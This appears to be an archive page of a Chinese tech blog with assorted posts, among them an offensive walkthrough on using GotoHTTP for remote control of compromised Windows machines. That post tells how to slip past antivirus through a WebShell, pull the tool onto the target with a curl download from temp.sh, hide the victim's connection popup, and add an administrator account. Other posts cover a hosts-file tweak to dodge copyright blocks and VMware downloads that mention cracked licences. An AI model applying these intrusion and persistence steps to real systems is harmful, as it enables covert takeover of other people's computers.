Wednesday, November 27, 2024
Sunday, November 24, 2024
Linux应用保活脚本
常用的标准Linux环境里都有Systemd提供后台服务进程管理及保活,但是在一些特殊的运行环境还是需要简易的解决方案。
比如在serv00服务器freeBSD Linux环境下,可以写这个这样的脚本:
check_and_start_process.sh
Saturday, November 23, 2024
Saturday, June 8, 2024
简单的设置: 迅雷经常出现应版权方要求无法下载,或者无法云收藏
【如遇应版权方要求】
迅雷经常出现应版权方要求无法下载,或者无法云收藏,我们可以做个简单的设置
步骤一:打开 hosts,具体文件位置:C:\Windows\System32\drivers\etc\hosts(自己电脑中找不到路径,直接将文件路径复制到你的本地窗口打开,选择记事本打开)
Monday, May 20, 2024
【远程控制】GotoHTTP 无视杀软实现远控
使用场景
在目标机器有杀毒软件拦截的情况下,CS 可能无法上线。这时候可以用 todesk 或向日葵这种远控工具进行横向移动,不过这两个工具由于国产化,可能不怎么方便。所以本篇文章介绍一下GotoHTTP
这个远控软件的使用,演示场景:目标机器为Windows机器。
需要注意的是,官网下载的客户端为被控端,控制端需要在GotoHTTP的官方网站进行远控。
官网 & 控制端:GotoHTTP – 在线远程控制平台
优缺点分析
优点:
- B2C 模式,无需安装控制端软件,有浏览器就可以远控。
- 流量走 https 协议,只要目标放行 443 端口出口就可以实现内网穿透。
- 在低带宽也可以使用,运行占用内存极低,控制时占用 CPU 仅为 0%-3%。
- 被控端在类 Linux 系统上支持图形界面(GUI)和字符界面(CLI)。
缺点:
- 需要管理员权限运行
- 一些行为(网络唤醒远程主机)需要加载驱动,导致运行时 360 安全卫士会拦截这行为,其他杀软则不会拦截。
使用方式及场景
拥有完全权限
在掌握目标的完全权限情况下:管理员权限以及远程桌面权限,那么可以直接将GotoHTTP的被控端放到目标机器上执行。打开窗口内含电脑ID和远控码,同时在执行程序的当前目录下,生成gotohttp.ini文件,文件内同样包含电脑ID和远控码。
然后在GotoHTTP官网
输入控制码,即可远控!
只拥有命令行权限
这种情况下多数是拥有管理员的命令行权限
,如上了WebShell拥有命令行权限,但是上不了远程。在这种情况下就可以使用此方法了。
如果有WebShell管理端的话,直接上传GotoHTTP的控制端文件,没有的话请看下面!
先想办法上传 GotoHTTP的被控端程序,生成一个下载直链,这边演示的是使用 https://temp.sh/进行上传后生成一个临时文件。
在上传后成功获得一个下载直链,需要注意的是:temp.sh
这个网站,上传后获得的直链,GET访问
是文件详细的HTML页面而非文件,POST访问
才是下载文件!
在你的WebShell端的命令执行页面或其他可以命令执行的地方,执行下载命令:
curl -X POST -o GotoHTTP.exe <你的下载直链>
然后运行在目标机器下载的GotoHTTP.exe,执行命令:GotoHTTP.exe
,运行GotoHTTP,然后成功生成gotohttp.ini
文件,说明成功运行了!
通过读取gotohttp.ini配置文件,读取远控码!name
为电脑ID,tmp
为控制码。
接着打开打开在线连接网站:https://gotohttp.com/,输入电脑 ID (name) 和控制码 (tmp) ,执行远控即可!
注意事项:成功连接后目标机会自动出现这个弹窗,手速要快,把它最小化
总结
GotoHTTP 可以成功绕过免杀进行远控但是需要的前提是有命令执行和文件上传功能,命令下载文件的话需要目标机器上面装有 curl (应该还有其他方法)。
而且连接成功后如果目标机器锁屏的话那也还是进不去桌面的!解决方法:
- 创建一个用户:
net user <username> <password> /add
- 添加 XX 到管理员账户
net loaclgroup administrators <username> /add
Sunday, May 19, 2024
2023 年最受欢迎的 Chrome 浏览器扩展 - From Google
一共12款扩展,多款AI 驱动的扩展插件上榜,有你经常用的吗? 或者你可以在评论区推荐你心目中认为的2023最佳扩展!
1. Scribe
– 功能:使用 AI 记录工作流程并创建逐步指南。
– 特点:自动记录和生成详细的工作流程文档,方便培训和指导同事。
2. DeepL Translate
– 功能:即时翻译网页。
– 特点:提供高质量的翻译服务,支持多种语言,帮助用户克服语言障碍。
3. QuillBot
– 功能:快速撰写和回复电子邮件。
– 特点:使用 AI 辅助写作和改写工具,提高写作效率和质量。
4. Sider
– 功能:浏览器边栏,允许使用 ChatGPT、Claude 和 Bard 等生成 AI 工具。
– 特点:无需打开新标签页即可访问和使用多种 AI 工具,提高工作效率。
5. Teal
– 功能:用于从流行的求职板收藏工作,跟踪和管理所有求职申请。
– 特点:集中管理求职进程,提供清晰的申请概览和进度跟踪。
6. Transkriptor
– 功能:自动将会议从音频转录为文本。
– 特点:支持超过 100 种语言,适用于国际会议和多语言环境。
7. Bonjourr
– 功能:保持浏览器主页简洁、美观且无干扰。
– 特点:提供优雅且定制化的新标签页体验,减少分心。
8. Speechify
– 功能:文本到语音扩展,朗读文章、电子邮件和 PDF。
– 特点:使用自然声音和口音,包括名人声音,提高阅读可访问性。
9. Equalizer
– 功能:提供更精细的音频控制,改善在线内容的声音质量。
– 特点:适用于各种音频和视频内容,提供个性化的听觉体验。
10. Boxel 3D
– 功能:平台游戏,挑战用户创建自己的关卡。
– 特点:提供创意和娱乐的休息方式,激发创造力。
11. BTRoblox
– 功能:增强 Roblox 游戏网站的功能。
– 特点:提供更丰富的 Roblox 体验,包括改进的用户界面和额外功能。
12. Coupert
– 功能:找到网上最好的促销代码,并在结账时自动应用。
– 特点:节省时间和金钱,自动寻找和应用最佳折扣。
ALS - Another Looking-glass Server - Showing your VPS performance.
这里推荐一个程序Looking Glass Server可以让你更方便的将vps的性能涨势给小伙伴。还带自定义md说明,方便你加入你的aff链接。
1.docker安装
curl -fsSL https://get.docker.com | bash -s docker
2.说明文件设置
新建一个目录, 如 /opt/tHe_DaTa
然后放置 /opt/tHe_DaTa/readme.md
.md文件在线编辑
https://pandao.github.io/editor.md/
3.启动docker
docker run -dit -e SPONSOR_MESSAGE=/tmp/readme.md -v /opt/tHe_DaTa/readme.md:/tmp/readme.md --name looking-glass --restart always --network host wikihostinc/looking-glass-server
4.常用变量
Key | Example | Default | Description |
---|---|---|---|
LISTEN_IP | 127.0.0.1 | (all ip) | which IP address will be listen use |
HTTP_PORT | 80 | 80 | which HTTP port should use |
SPEEDTEST_FILE_LIST | 100MB 1GB | 1MB 10MB 100MB 1GB | size of static test files, separate with space |
PUBLIC_IPV4 | 1.1.1.1 | (fetch from http://ifconfig.co) | The IPv4 address of the server |
PUBLIC_IPV6 | fe80::1 | (fetch from http://ifconfig.co) | The IPv6 address of the server |
DISPLAY_TRAFFIC | true | true | Toggle the streaming traffic graph |
ENABLE_SPEEDTEST | true | true | Toggle the speedtest feature |
UTILITIES_PING | true | true | Toggle the ping feature |
UTILITIES_SPEEDTESTDOTNET | true | true | Toggle the speedtest.net feature |
UTILITIES_FAKESHELL | true | true | Toggle the HTML Shell feature |
UTILITIES_IPERF3 | true | true | Toggle the iperf3 feature |
UTILITIES_IPERF3_PORT_MIN | 30000 | 30000 | iperf3 listen port range - from |
UTILITIES_IPERF3_PORT_MAX | 31000 | 31000 | iperf3 listen port range - to |
SPONSOR_MESSAGE | "Test message" or "/tmp/als_readme.md" | '' | Show server sponsor message (support markdown file, required mapping file to container) |
5.Demo
- http://lg.hk1-bgp.hkg.50network.com/
6.Links
https://github.com/wikihost-opensource/als/blob/master/README_zh_CN.md
https://github.com/wikihost-opensource/als
Saturday, May 18, 2024
VMware Workstation Pro:个人使用免费. VMWare Workstation Player 结束生命了。
Download Address:
VMware Workstation Pro for Personal (For Windows) 17.5.2
- Name: VMware-workstation-full-17.5.2-23775571.exe(618.26 MB) Build Number: 23775571
- Last Updated: May 16, 2024
- SHA2: 2c3a40993a450dc9a059563d07664fc0fb85ae398a57d22b1b4bf0e602417bf7
- MD5: c0a0353c1dade2089b55ce04ca942964
- Download link: VMware-workstation-full-17.5.2-23775571.exe (pass: winningpc.com)
- https://od.51sec.org/TGM_51Sec_EU/Sharing/VM/vmware/VMware-workstation-full-17.5.2-23775571-win-51sec.org.zip?preview (pass:51sec.org)
VMware Workstation Pro for Personal Use (For Linux) 17.5.2
- Name: VMware-Workstation-Full-17.5.2-23775571.x86_64.bundle(510.58 MB) Build Number: 23775571
- Last Updated: May 16, 2024
- SHA2: a9da5e9b785ab98c6f49d1e769f6885028fd115c96e3cf0e6d22da3112b89a21
- MD5: 70adb9ba7305972eeb845eac5d69b32e
- Download link: VMware-Workstation-Full-17.5.2-23775571.x86_64.bundle (pass: winningpc.com)
- https://od.51sec.org/TGM_51Sec_EU/Sharing/VM/vmware/VMware-Workstation-Full-17.5.2-23775571.x86_64-linux-51sec.org.zip?preview (pass:51sec.org)
VMware博客
发行说明
许可信息 License Info
原来的破解版升级之后的许可信息
全新安装会适配语言